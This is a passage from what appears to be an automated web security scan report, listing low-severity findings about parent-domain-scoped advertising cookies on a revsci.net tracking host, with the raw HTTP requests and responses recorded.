rsi_us_1000000=pUP1JU2j/wMU1Y1iQBIXbzy7gH/ihA5AE3QfIwz8xaSP/weZt3Sp4nMZBHxN2co0X00La5kI4tNZ1ThMiPe4UvEhzEJiLjLx4QIdzMtmZSAnkdV64YI7k6ngB3ZFtFBLvOO3l29lYEILZQP235tzz7ylPbi0ZCLAdKn/NO6nr7LHUsr0ztY5dAkZvxeeR9vAMcRa784UqE9WHm29W0kIkyxes2nWBfEpdBQjyWI0AzXc6T35kgzh4efWmgHfVamKKMWPczhSf+ff72AHHgdjbN/5KbERi+qWlAj6EeqJfTntI6mLxDhIgOI2RyJiaCyls4P5+xV4npm68sCzFyDr8xCR32AMCNw7ucv9sISCZzDDJovBCl4dex8pqDnBjc9K0U6asnoqYjIt2nGfrgmm/IX8UZchd+xfjA2tHPv8XdqMYNn1xPNktfW1IMWUuYJMkP5nalJMNB+99Hie/N4BmQuzWa1EJha2gPlVxsRWrXZEgRgXr1FKd3X1cDa1UrhiyhqcD1kPPBwjHqKsn4s72LBRjy45G39ZZc1g1ndinyBGR6Kd+KyLXKFs+LWnI1Uzn3FVzFRztk2VE0N535Bkvh3bt/N5vIxnechclQrHwPJkCtDU9qc8eBvj55wjAwRxywsZZVDPh5RPpzsEodtG6DIdhEt0bqa58HDOUe1fwKgtQEdp66qywl7YSK4Di1B9FQeoEXjP6rVGtjf8QFjT5FMwHQ==; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X50BYKwAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKEAqftuIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmSy+4mu22o+sIcAigrxYBwOnFIdqzXCCrXdEH3+Olb6OSMFWO3iaX3U4x5KBzgTdKqo3qP1+dhvPBdk0F6kk5vSO5dZn8zXmFIIN7e94ecrLBjC1dm4+Beh8RjOrAygahDkl6K488pBeeIs09+i8gVnW35eMYMfe+mASkY680T5MHCcSqMvv14GjHCG6MET5ZjA0P1fPCYqxcM7JS1O1tbe1JF3M3dAw=; rtc_JBVL=MLsv8VUusR9n5QgQh+2eD1ty26AgQ+XLMXEmNDUbK5xW2nYekizNLI+Ux4AdIJIvEz27RctNtu160CrFcHVQoKWkTuKSCpNTgbvpjz67BYju6GP6An+lbHIaUOtknXHGOAK+fZEml7dCRGXSwBpNVfDq/TXdwgK+JlBYZE67Zx+21M0S02XA7asVwUth1lXYNhAEExaYdZisiph5OSnf6VxvmIMSpXPp4T8KumNJqNdeCIzm9EL2KtYg7ZrfZFsbKtm17/2aOKtylcUAByZGCb5PqXiHqBrJpAY3WQch5WpGiEJL3KNQf2kiWheqMV/jIumc0t1Rj2vo0lAB0BDSHG45W9vquc56YmBh4OQsy3SW269zAR4Q0dNKS5dYFtvhn1zBUWXsHy7EfWKrrGhIAt2eI3LUEO3qr+WZzD1tst0HBkOfjr8xKHFpE56ynldIDD/7jtnpMaZ2kgW+3CXBMVZ5aj2WNJz757mLJ+9U4RjdHCbwcZxC8lFzlNF3k8pFAX0k3gxu/NOw1EZc3DLfc1eRsow=; udm_0=MLvv9SUJaSpr557EdtIX6fE3HZxD2jF7YYAV7uTQoXkALe+h8IdgKGHlqVer8ks7t0GGuQivKG4y2XF+Szoxs+pgJ0/nH2Ui0s/LZADpaqXvbiZFZ47pAMQHM3wsfNN9cBGbCJGJccifsC6cI4o0hggjHk2vCjLhrtdNN0/FJ9JkGTRSFTRPCuv30GvJxX6MA3P+3IgxfcVau/5rPeFRygZ2Apv13EfP5uwyggle26APHtS97hgJom9QzFmbskdopka+eDqJPhD21kuC7KRRVh96kUCUspZy73DHW3N5Irc/jZGh9PeoeeO5jXKFZIIS7CVGvcGNr73gvTMfodX+B1jFeC+aDEHD5ULvp2Cjj4hdZusIxpUz9t45xvB2KoipTozDoxeFn1uJL0nO/jD9658z+7LiPZScmG8djY7SJW6sQ3pwz25kh+gDhoICW2/qZUhClAdlFa8It9h+Q3bNPRZJcG49HJYoM7vTTaTWkQpmzq5K94UOniBJD1z2FoxkvNta4OXwgArX4hsjIHypbUV+PoPh7+GC/RCblOaZzsp7jwBg68gVKHnnVCE59ss1SuvSo/APWQqFRGAe7Bjr9GcnT0FFDQQyTszjrf5QQlvbKIwEExhQMo10SGqH8E7rgEMN1apbbGRCkUWyLxrOe8U/R9CK2l/UHVw5Tl+hi/uRekDnjtylTaDGVQcT7CVGbZiKgcdH1XMx2WdoUSVh9tuGEXNWFSIx7Zq/yCPRCO71+WdVcdE4N/UzZ52cn7igVQC2Mfo0Hq1iU+pVeqUj0QAL4JkY3VyZCpejOFyJlf/t7v+dFfaiWNpFyd7lOU14UmlJpqxStIb8jJ6R7xY+cFWnJjQmlula/EGacp4DRUM6bEa2NSizHfsjEqgPP4Bafzg3P4mTLsbNAe6Q+9gf00BKr8ScRnxJlEf6oloMey8SuxzcC/4TBklWWbbRjtft8ShFHE0kqP/uQ56C1hw7vwpsjo9Y6RJXldPiQ60QwwL34OKzufyEBAR2MFV6+1vx6BvM5eaTVPb7RwPpjo/0KKUsLcYE7x7eUCTf3MFNteHrCjEaxMD6FiMtLjNopt2etE0t9szMRSyJidCM/VqZ3IsLX/oQkJxExMf8EXMRIy0ud0o+gBaMQVr9erTiDYbs9H/MwPVxPJZhFlmAwkq7o9DbtRIXDB1QcO4bmu2rrCTeVXuPZJgRjOU=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_JBVL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637UNESU50e19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5ln6LIbyX/hYsFy7h6ka2YtGHF7L0J0A7uDKsLBjQfyzmVKgBYCKKxTZuxZHFHYbHosr+2FiGJnoSu9TOv0Ed0bwH2nbLz+xScNbpzP0FbWylm52l2SrEimlz7VnNrLWtvO3pTkZP4PmzvwD1+ZYLPB6+Yv1VnOADPTNhgQhyidaK4+8X1pwJtE9ZRY2wKO+8M17IRN2vKp+DAHT4wyj363ZVXfWq0eYRtAJYlo/Ri/BL6yJVWFVBJy4P1p7csLIAQP7dBQ=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:11:15 GMT; Path=/
Set-Cookie: rtc_hpqF=MLsv8aVKMT5j5oLEkrhIMohGIOhkT2KrqjTC5Waa85sd3XtYJlhOwG1tfjK7UWmvp+UXB+11jW4pxhvc9EIyKcbf18wDEpPP9J3s63g7N4gnniGrGmYG6i5VHFLqEP1X3/2H7VCrwcXndfedqtqR/qCtqPt+0Q+bTPdy7X8RiP+3VIJDEnzycFgtpSt4FyrYNpWdHZybWfgqNUd84d96t/tOdIoVUoeTNAh0V0yrFDcbJGVrs3NCoUKLL/us5jAPfUQKUkTrPComdnLK11baAPXRgDACqxX152M0Wx6tr6STLNH6Ipn2Za37FPk5D38UmNaFlaeYgvtCOiXAC0hdmtBShNPv+9selQXtPLMtpAvSGnOFdRE5UTzhoa6hsiZkjy3bfoCnFn6kAzCvN0CSBUVTjhduVFNSTojejG7zhUcxLLELAO0+zZWn9k4dxgIaRNpx7k+9tKld56fRWzzi5bDtT9uB3UxAlsyZIUHL2/UrZ4t7jsaW4bBuCK8PdFhIyid8JfdqWso1Sxro/9ulzTKEVwaw+ts=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:11:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:11:14 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
5.92. http://pix04.revsci.net/E05510/b3/0/3/1003161/317116761.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/317116761.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/317116761.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_us_1000000=pUP1JUmj/wMc1Y1iwFPRuygREfL/eSNiaWsWM6so3gd4HwfIp4qMv58DSCGvA0dEdmVGSphZQ8fIbaovkYwFln4eYkopATLN/Z6NLO9/SEJhThUPn3csMfikNTxXZlyFKjGmOvw68AwYuzmk1ytiuXCtXr4kYoguGmnsXsSg57yihsEgM83wt6VmlvvcdrQ3x4QaPU6SxfPlwjfsKx6Oo2D9vASkUyzSVrX3wBBUo0hqSYxC58KnoX9UN4X1kpyaUhWtCW8ORNz8CNbtMB8vWy5E7hueIqAjCDoVGGbmPWBhTXVhqLiAmDlPYMUKotXqtuhtONjDylQaCFHEir/IuwTH6W82k2unh1FKMoiHtJBYM7q1rrLVxUKYqeVqcU6Y+aBSVjM0vHEUr53jD6tTO9RmfiB6vmlTcpbA0727zUR6TCryhcYeKvSovZ2b43EgPXRh3hm7iXwTA61SPnOHThTMzq8DA0um0id786X/KKBM4TOACjQ+CQ+u0mfksyjk1QwJnD+IeliTF5klkfVerttMJH3zAF5irPszYNCuaxotcy5ptln2R1R5HIogSJqlc+9J3+Fid7UXSQVJ7zVbJ1Ck3M8zNO2tYa4nC10W37WZDHkA8QIm5adTmFDtLfrY+/M8mL6ZQFuYeqs9fbbwr9kMbacIVvwqzu/nilqeY8rwOeKa6v+JwEwjuYjK4YhYfuwH8h7GZn7SkAs0lUf5VHY30w==; rsi_segs_1000000=pUPFJ0OBbwIMV594t637UNESU50e19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5ln6LIbyX/hYsFy7h6ka2YtGHF7L0J0A7uDKsLBjQfyzmVKgBYCKKxTZuxZHFHYbHosr+2FiGJnoSu9TOv0Ed0bwH2nbLz+xScNbpzP0FbWylm4oiMhAYEDcu0WzwG1PEbSsw9vzPCqIlOJ6rlytUwzs0GwMMi6xK+qW+PXp2u8KLNdPshDbiMHXreN4C4CtNT6GPrBjxZfmwwV/z7MRYksCSdoMkmS0zwAk4CbduJcL317Ni6mclCsxRr8gL/ZIAgi6dA4=; rtc_9r6j=MLsv8SNKcR5j5gKpOJPAaM1326Pgb/GNqsTY0NBa85tW2nZ+4HclLI+UJ2ITMNEFEk2HLmH0enhjxzNy9BxliOCugfHcmbJH8Y3cFWcEJkoClbAJNOpXzUZmzifpQzufoP1H7NCkzcTndfddq9oW/qCtqKNe0Q+bXJhy63+RiD8V9pIR02XA7ftd4gt6Fy7YvLatgI+ei0vAChIQd15DgUXLWoixpPVYawV3Flca8b/KKkAFs2NFpgIJTLcxOajJX0T+ISe1UmUP8t0onGfGZRmuQqQRfmW8IvIgl5n1QjVewSFnOZk2ZK27ZPm5RTddB76fAcjxcBRhviEHPY+rnFJE8Cm3PNYWZAEV2YQjpcu42oRWrwM0IAG4zYzzZCP0TJZD4jLuDf0W6jDbW7M2ff57dgeG7NNJiENw884u0XOx5v51YrEHXXGGpOceQzfmTGblCssqneFWbQLGeG7YskyHLS07dK4O+wfpTMwCihN0LcewWMQtbdn3qnEpDQi1zMltbwaPxz5w8Zqq2wPcL+aYaAN4+yE=; udm_0=MLvv9SMJaSpn557EdtKGREzM5uAkEsBEcLqEBjKmOxig90jsQpPrRW9xUPO7gbf50ex879sHUlxsDSMSyT40d3g9PNkmj5UlcMTLNnXBJEFgefIl9uJ0I0vU47hEyOf8RwAvASPNmI1Ph41Rd5kyzrBMoavoxBfo+f9o94awgHYvDAVMHG7trWQjV8FVvvSHmTjum3X6XmcPzeZ3yadmjjtJ7Kc9GkNNLQ4XsSl77KmyKuIe9bhMCk2cm5+2yScc/SESee/uF/5ZASzKRUgNNAf7S2FOPKrNb3MYEdx44EZy+OVCF6wLyOK0upKsRu5FazY+YpctvvYyjZ5DcDUTeWnmNc+Aw8lfDD4gEAhNTnms1TrgJUtYm9u0OKszQunHTtHpKSmQmZ4gk7W1IHzKTH/Gx1PJfMOjZPf/iIv3wotd8zFUET54ZLeZDKHDJMZePuwsB4OZalv+9MIIRQ1BXEqcEQr7xrmD58aHBz7kVJueYZp8JW/hOoDAOSwfHQ2+ncEPPr23sZQdkqUONCRp1URGfTEI9YL90bxDjNGhjNnObrMpY+innsl5Y29jwm09rChXDu1B7hKxpnB4t0n391lOpIk+C6G+xG06nPck2RADYHAoiMw33PqxWTAlrkQxb7kMt2x0B1kmo54K3075cAj9FMimixp5iYs5mLsCw7whgwQga7EA8xDtS4q+mQJsMPuen4UuRFd9Osx8dAJkcuG+OgBkUgAeGO6ZMDTRvsbmC75vuE8pQEi+sWrdHtYcg4aoUaXUtXoEM61C+Qtasi02PJSVzgt+Tfzcj+Vuug75lbNyEQpiFVWUbedwECQ3hGfVj9wLx3T/m3Bd3h2lMXFgPnAUUFb4k2XPyhbgf0cS5KKowubzVKuru/7TGc8uMc9/Viex8Wy2tyb7tzhFlXuJHlkQz/Kntc5iEIyjb3+OcJvIidMDXZsupJCxfOUT00YlNk0k6oE4hwgJU6ShZA512Byfkq0M4BVW9pnm8JZsoCgo/uh3kkPyzQf4pyMyO/EBCsNYCYTRP36GL3HbGBxlla1+snq9a8/UoSAj4pRnCOMDno7SoXyPzFf4T9PauSfuc+8CnJTpKVMgwZ8BsAwZkJL2z9dxFP/MkDAVfw7jIXQXzkn839hcHYm2vYEenF5uIoyfEoXL3OtuIu2+tgZ16ewjDP4/0PUW4o+4zp7ytKZF8vMGn5Vk5MWaOuRPpJc=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_9r6j=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5kOBL3IQT7uItGE2XpyB7su1FubvSC6kP38I2QQ4mm2N8+LE5ntqFncA2iMgLzp61YTXHAmxMT0BEofXzqA4q5nO0qB3YgnMEHRZn+GVPSDlVTVhzgssx0UibzpPBbx1sohw1Ku7XP/UpHQw8v7qToLx8h7btv3UOvsoBv+jNeizMRWk+91pVGXO4EbNtWt+Z7WENR6xBL79Yu7fwn74XuFPQ3KgSwnBj9m+Z82mokEBkUX+KGNheVRXk0E9bpCCb9nzo/d0pq6G3lekSwu3iTlIO7GfAmvzWuTt6XCh2iKpWk5xq4B9Iww3rXP2D0EE6lPfLJCdaydlvw==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:41:16 GMT; Path=/
Set-Cookie: rtc_kQ5Z=MLsv8SVKcR5n5QK06RsEefos1n9qAqSNqOTc1vAOx18gmPRntkb+X6ew46Qd/e8D0k2HLWH0SnhjxyMEIYa9cFjm9hqKilvuUgHGjE4ROPSm3gG33mcGhvBHWDxsf3HGKAK+fZEWt79CRGXQwhpDVvDo/cXdwgK+5tNZZE67ZZ/7ESRFEnoycfhd4gt+FzZQPhAE0heYFZiskph5OSof6dxvmIMivXTp4ylLQeYUIAVWNFqAQj8T3lJXoQcw/N1DSbsqKUFApvlKeoGXZR4mqqN7DLaaQuzGzPwx+FG7xrR8XPF9nxui0whM/am5qG8m2qAX4vb+HuYkCHzq6PvePG/iZqeiDINRSgDtOsLHX/Ecogf8MMS+uDN74BvnXLSmlfvQjeNcQLcoZwGAhOp52Ft/THda2EY/irw6PMkGDAtu6CwLi1xg4umu7U+DTm5gq7YW28UEP5gUH00YVajQy+RyJUSFR5SnR42a10dhJ8urUlh/I1iHVK7Ff9rMbq1SpKIAEKNsF7bsZy0IqMsfOg+8bA==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:41:16 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:41:16 GMT
Content-Length: 759

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['E05510_10390','D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsi
...[SNIP]...
5.93. http://pix04.revsci.net/E05510/b3/0/3/1003161/411477495.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/411477495.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/411477495.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2XpwByK0AEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAyxxuIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmSy+4mu22o+sIcAigrxYBwOnFIdqzXAgcYSPm8EZaD/7SpOSG3iaX3YTPoqBzoD8pH1IFIWVkxjl9F9nRQH1zMS+5igI9GGvOug4t0h1p/8J/FnlWRtvxbi3p+TVFAetR3xquJQK/0VsX9qB+HLnpGyx2GgE/nbk0Odce2Gyc3MJ8FduK/DOUFB0391Wa66ieCDitvryM6yN36H8d4H1kOXUx/XgVwhJd; rtc_aq6P=MLsv8SVKcR5n5QK06RsEefos1n9qAqSNqOTc1vAOx18gmPRntkb+X6ew46Qd/e8D0k2HLWH0SnhjxyMEIYa9cFjm9hqKilvuUgHGjE4ROPSm3gG33mcGhvBHWDxsf3HGKAK+fZEWt79CRGXQwhpDVvDo/cXdwgK+5tNZZE67ZZ/7ESRFEnoycfhd4gt+FzZQPhAE0heYFZiskph5OSof6dxvmIMivXTp4ylLQeYUIAVWNFqAQj8T3lJXoQcw/N1DSbsqKUFApvlKeoGXZR4mqqN7DLaaQuzGzPwx+FG7xrR8XPF9nxui0whM/am5qG8m2qAX4vb+HuYkCHzq6PvePG/iZqeiDINRSgDtOsLHX/Ecogf8MMS+uDN74BvnXLSmlfvQjeNcQLcoZwGAhOp52Ft/THda2EY/irw6PMkGDAtu6CwLi1xg4umu7U+DTm5gq7YW28UEP5gUH00YVajQy+RyJUSFR5SnR42a10dhJ8urUlh/I1iHVK7Ff9rMbq1SpKIAEKNsF7bsZy0IqMsfOg+8bA==; rsi_us_1000000=pUP1JU2j/wMU1Y1iQBIXbzy7gH/ihA5AE3QfIwz8xaSP/weZt/QtlANGXMBv9GRWUWkvW7oCUmYVXdoi++njdd5WYXAkEjXC3b6BYGuX4Z56nNueZBHer8W0Njx0fnPi+mTpJvoXuH3AGPPFPrjdsLdNGrzLRNIK2neDLTt85qBbBfuDCK7OTYIw6GjG8rXnzjcOLZx3vrwwn96lg6Hp74OpttH4t8ldO3N+DAROs+zPatL8p8geXY5kcKAtKe91HqUPfqhFa0UnFfqQEBSUgejq1USeaTQKh6b6+XNH+MHR4xEFlaA4lL01Xk0SaDaPMUBbFNFBs/CRzFvdnGR7Yh/A2/F66zclu+cW+HP8/1e+f2t0eQMEXHLswtkECnf+U4dy3j3E76Fb9jGR4BvqqDGVqi0KGYvRCRVainNGRn3m5kHP/46H5qbow5NmFLhAjPRzQCxD5asNAhQTo5I8W/le/szJGgOF4q3nw0INTDJW6ygOePhzIlW31o5Q+4F7PhNZFJR+NWfyQqAvOmai/NSKXKEIaAI7tQ0CyU3GCQWLMoSNGoQcncwNGrsUdVKECfuL6NtAbdLDGHzsBTNWkl7uDuuZlXGNdVHCxzKETc6QHCaT6JTiPER3e+e5YTxodI+LP3t/Yt1QYznHeYvAhi3R1kMc7IblPeDGlV8MKdDJyidtCuS9bT67TqQRdFTo5P0q/Wz/QJBJAm/HW6rVqe0NLirW; udm_0=MLvv9SUJaSpr557EdtIX6fE3HZxD2jH7b5aaSakC1Vxg80jsQpMZ/WRp4QDAVMIXPL0pRtkHUlxsDSMSyT40d3g9PNkmjzUycMRLNlRLQHFpSyLGY5hDuOC+N0tBrNd9cBGbCJGJccifsK6dI8o0hu1fI/eEFEAnHDPsK/YpRNnmR8L4RHZ2VqAiEPjG/hfb7pcnUO3uQiIK6jEC5BXe27/KTW/3P8PF1IA8UexF9jf4H7qqHg4fnkmamYYOi9ghHm3z5Baxa1MomEcaz9jcyL6I6rbqQWRyYS5KZgJhYEDTqDbHEksBVRyaBbcgG2aBSSgeVAAOQrIfKaR/+ja9krFLWox2wD5sTDrVZObCNTpgXyJprl5LU/D0RmSwmrY9oHPGg60MVZfnt3J+2V1a3+1ThXnfqWXY7dmfpeBSe7tHb03mbWeIuzSbnlH6fP0gD1QD1Ol6L0gJulVUa9FmV1tHK3oJgywmh8JOp8maHXuy/QvkkkvZNb7IS8o3j1AIMTH0JBtTXSsGnj8zZvxRbH09DOmI/J6ucYiD+N0CLYiNV01FRH+CPDJTeuBDBklKrs4gR0iKAEH2RgXZMyiOzWPfE94MTlKgJ5QHZ8Lb8xE2SNTB5plZMNKBZXn2HkhC6mNcWEiBe0VGuIyPlS7gEJSUPPYtpDHvhrCAplSfM0zjQUge9mubF8He04QLc6QbisrWSlG+Kh2XK27nZyBxCJOUbOrEar4rpZVWW38vpN/uzfLsqjLgx1MIrZZtVsBbCVj9+EUojgxvC8EQEF/7bArlOc0YkMPG4XrdFRfePlg1g5a+BeHsHl5jBHepcDbKJIkFJ+vL/PCMbcCNXK7exSH/Z1HxDKTvRWnTYEn0vvj3te2F8+QQvpeS/df6Olx8q6GlVs3YZ49fvCKNJI/izYWWfXXIeUY8mPlHhiu795E9lOHCkNMA3c0HF78e2GR08z/pjsepNoaRyi7Uj+8+8xy13145ID5oHIEU/p+nyCnTObgfX9Zx+qAj6GeslrckQMeVMBVB7aLQpimgGpnEf9XtPz6pAilL/DcZSwkydwMAkoyf80kpKFw/KBw1kYRiY3gw0+vsHfeE0Lv+DBNfio8ZfcWqoinV7GMIbrcoXD84FVbnuoezpB0MgW6bpxAh25nUM7tfv2bpMcyizDXFFqB1uviYs5t9F4C4hjumVJi8p40t5RLNXA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_aq6P=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637EJESU50e19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5lmsbsVwZ3HWVujzlSO+7+QCt8SeAqAMEO0pdHOlwXtZ/bSmHu66WBFOadqLveHQcgzKmByqkFUQIS4Za3jEcroE3ia4qkYzAj22SLzyuxCuNtcFwlSKLDfLgmRJ9q0bwCU5poXaK5yamlWkchI9rOYtaQfXz96Js1WGlAShjXEmKfWRz0RaTx9vSg8rrp7Rm/aFCh47XrveaAN16gwTSIoJNQ5TuRwQ770mEpHQ6xYAKaNTgXMVoe8i5kpQG10naY898CLtg5U=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:51:16 GMT; Path=/
Set-Cookie: rtc_OCce=MLsv8SNKcR5j5rIfEu29cZQk1qHgb/GNFtDD/eZS85tW2nZ+4PdKBMFYSwStZcq2W36bSe0ta4aBtcbhLdgI9LoMGKa5GuMToA3eQeJsJkoClYAJNOpXPUFmzicpelh7G6kTqjCcVqwnbT6anjq7qwhyqKNe0Q+bXJhy63+RiD8V9pIT02XA7fs94tthljbYBpUdnp6bdfgqNke84X9v3vsueEp9WgNqt+j098lucnP0omJ4g3A43egtb0KQWOSq83VPTkQfGe9eLzlQ/v07ZrrDNgFfUxX1p9bNpusgNIHmYpu8oLbPiJQW4jZo2RErb1BtLkTFqX7kSuCpE5zCHCD50uVRp7rZHyj2WYkxHhyST5yyQ75NyeH07zX/d6NoFWYD+ou/3w5Y65C0r5Xjprva8MeN/Q9l1lWMMBCY43EBGnt6QbSG3cosa5cqJlraNXOD619Ive6sztZHfe6nrOwb0AmeuU3aTRM2ug6He1RHO6nxwnTn1TMReHrGrfMCGwczJXWXzCdVjnQMuTve3K4YE4vkJw==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:51:16 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
